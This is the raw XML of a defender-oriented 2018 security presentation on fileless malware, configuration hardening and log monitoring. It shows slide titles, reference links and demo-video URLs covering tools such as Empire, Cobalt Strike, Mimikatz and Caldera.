                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abusing Windows </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=rjRDsXp_MNk&amp;t=627s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://screencast-o-matic.com/u/vqZ/CrackHashResponder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://screencast-o-matic.com/u/vqZ/PTH-Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to Monitor systems to find evidence of activities…</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What other attacks are there?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6497919-5A3F-485A-9744-3949473B921C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="4723091"/>
            <a:ext cx="3493309" cy="2104437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835B1EE7-41EE-4270-92A4-7AF6DC8A012D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252657" y="6197615"/>
            <a:ext cx="2638793" cy="590632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="696245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7E7D52-9407-4C0F-8628-53E03E046324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1983219"/>
            <a:ext cx="9144000" cy="4874781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33C61106-5B03-42BE-8122-7AD2E32C171F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="1603169"/>
            <a:ext cx="8184662" cy="380051"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More Logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://www.sans.org/summit-archives/file/summit-archive-1536351477.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D24285EB-D64A-40DD-930B-3330010BB6C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DevonK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Endgame) and Roberto (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpectorOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338309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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Okay, lets talk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843988" y="3567135"/>
            <a:ext cx="3060192" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D685AA-38C1-4079-8F30-7AC754CADE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="6622861"/>
            <a:ext cx="8222223" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://http://threatexpress.com/2018/06/threat-gets-a-vote-applying-a-threat-based-approach-to-security-testing/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="105508" y="2508996"/>
            <a:ext cx="8878539" cy="3781953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2765961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t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phished | Click | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>now what? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2508996"/>
            <a:ext cx="6553200" cy="3695700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380392" y="6365631"/>
            <a:ext cx="4870939" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: Derivative Local Admin http://www.sixdub.net/?p=591</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3845253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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Practices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; Benchmarks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>                 &lt;- Automate ID of vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>configs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>                      (Detailed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>StepByStep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Guide)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>                 &lt;- Guidelines to protect systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>                        Detailed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>StepByStep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Guide)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>                &lt;- 20 Prioritized actions (High level)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where do I start? How do I prioritize?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Being prepared… What can I do?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0BC86A-547F-403C-AED3-88FDCE58A901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="807073" y="2907756"/>
            <a:ext cx="4504762" cy="3304762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41CFE907-9947-4233-BE20-2B1C75E4775D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="807072" y="6215557"/>
            <a:ext cx="6086887" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference: https://learn.cisecurity.org/cis-cat-landing-page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="785640898"/>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16399</TotalTime>
  <Words>6057</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>760</Paragraphs>
  <Slides>65</Slides>
  <Notes>62</Notes>
  <HiddenSlides>7</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65</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="77" baseType="lpstr">
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Encode Sans Normal Black</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Open Sans Light</vt:lpstr>
      <vt:lpstr>Uni Sans Regular</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>1_Custom Design</vt:lpstr>
      <vt:lpstr>Fileless Malware, Config Mgmt &amp; Logs Oh My!!</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>Together We Can Defend!</vt:lpstr>
      <vt:lpstr>WHO Am I?</vt:lpstr>
      <vt:lpstr>What is the Agenda?</vt:lpstr>
      <vt:lpstr>Okay, lets talk stats Verizon Data Breach Investigations Report (DBIR) </vt:lpstr>
      <vt:lpstr>Okay, lets talk Attack &amp; Defense!</vt:lpstr>
      <vt:lpstr>Phished | Click | Attacker inside now what? </vt:lpstr>
      <vt:lpstr>Being prepared… What can I do?</vt:lpstr>
      <vt:lpstr>High Level Concepts to protect org data</vt:lpstr>
      <vt:lpstr>Benchmark: Disable Windows SMBv1</vt:lpstr>
      <vt:lpstr>Baselines still need adjusting.</vt:lpstr>
      <vt:lpstr>WannaCry infection via SMBv1</vt:lpstr>
      <vt:lpstr>CIS_Microsoft_Windows_10_Enterprise_Release_1607_Benchmark_v1.2</vt:lpstr>
      <vt:lpstr>LLMNR Attack</vt:lpstr>
      <vt:lpstr>Enable Windows PowerShell Script block logging</vt:lpstr>
      <vt:lpstr>How?</vt:lpstr>
      <vt:lpstr>Turn On PowerShell Module Logging</vt:lpstr>
      <vt:lpstr>Enable PowerShell Script Block logging (Detection) </vt:lpstr>
      <vt:lpstr>Perform OS Configuration Hardening!</vt:lpstr>
      <vt:lpstr>Adversary Tactic?</vt:lpstr>
      <vt:lpstr>Adversary procedures What exactly is that? </vt:lpstr>
      <vt:lpstr>Who has heard of Collegiate Cyber Defense Competition (CCDC)?</vt:lpstr>
      <vt:lpstr>My  Adversary Techniques/Procedures</vt:lpstr>
      <vt:lpstr>Cobalt Strike- Adversary simulation software.</vt:lpstr>
      <vt:lpstr>Cobalt Strike- Adversary simulation software.</vt:lpstr>
      <vt:lpstr>Cobalt Strike- Scripts.</vt:lpstr>
      <vt:lpstr>Adversary Metasploit/PowerShell Empire</vt:lpstr>
      <vt:lpstr>Empire?Metasploit Adversary Techniques?</vt:lpstr>
      <vt:lpstr>More Metasploit Pro</vt:lpstr>
      <vt:lpstr>Evading Anti-Virus in Metasploit Pro</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>More badness? (Adversary Tactics) Check with Community GitHubs and Twitter</vt:lpstr>
      <vt:lpstr>What Internet? (Adversary Tactics) Check Shodan!</vt:lpstr>
      <vt:lpstr>Adversary Scripting Languages, Why use one over the other?</vt:lpstr>
      <vt:lpstr>Sysmon Turned On.  Oh no.. (says attacker)</vt:lpstr>
      <vt:lpstr>Develop Defense! </vt:lpstr>
      <vt:lpstr>Use the Navigator to visualize your defensive coverage!</vt:lpstr>
      <vt:lpstr>Plan Defenses! Or Attacks!</vt:lpstr>
      <vt:lpstr>How to Score how we are doing?</vt:lpstr>
      <vt:lpstr>Measuring how we get better…</vt:lpstr>
      <vt:lpstr>US-CERT (PowerShell Empire)</vt:lpstr>
      <vt:lpstr>US-CERT (PowerShell Empire)</vt:lpstr>
      <vt:lpstr>US-CERT ( Detection/Protection PowerShell Empire)</vt:lpstr>
      <vt:lpstr>How? Have no fear Cheat-sheets are here!!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>C2C Empire Demo, Visualize our defensive coverage!</vt:lpstr>
      <vt:lpstr>Perform in-Memory (Empire) Attack!</vt:lpstr>
      <vt:lpstr>Perform Memory (Empire) Attack &amp; Detection!</vt:lpstr>
      <vt:lpstr>Look for Behavior</vt:lpstr>
      <vt:lpstr>Detection Lab</vt:lpstr>
      <vt:lpstr>Detection Lab</vt:lpstr>
      <vt:lpstr>Caldera in Detection Lab</vt:lpstr>
      <vt:lpstr>Caldera using Mitre ATT&amp;CK Techniques</vt:lpstr>
      <vt:lpstr>Caldera Enum and Exploit Systems</vt:lpstr>
      <vt:lpstr>Let’s add it to our HeatMap!!</vt:lpstr>
      <vt:lpstr>Yes! Look at that; Getting Better!!</vt:lpstr>
      <vt:lpstr>The End… until next time.</vt:lpstr>
      <vt:lpstr>Yep, that was a lot… </vt:lpstr>
      <vt:lpstr>Other BLUE Tools</vt:lpstr>
      <vt:lpstr>What about Active Directory? </vt:lpstr>
      <vt:lpstr>Mimikatz Detections</vt:lpstr>
      <vt:lpstr>Fileless Malware Detections</vt:lpstr>
      <vt:lpstr>What other attacks are there?</vt:lpstr>
      <vt:lpstr>DevonK (Endgame) and Roberto (SpectorOps)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jesse moore</cp:lastModifiedBy>
  <cp:revision>816</cp:revision>
  <cp:lastPrinted>2016-02-10T20:19:12Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-10-14T00:51:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-22T18:42:54Z</dcterms:modified>
</cp:coreProperties>
</file>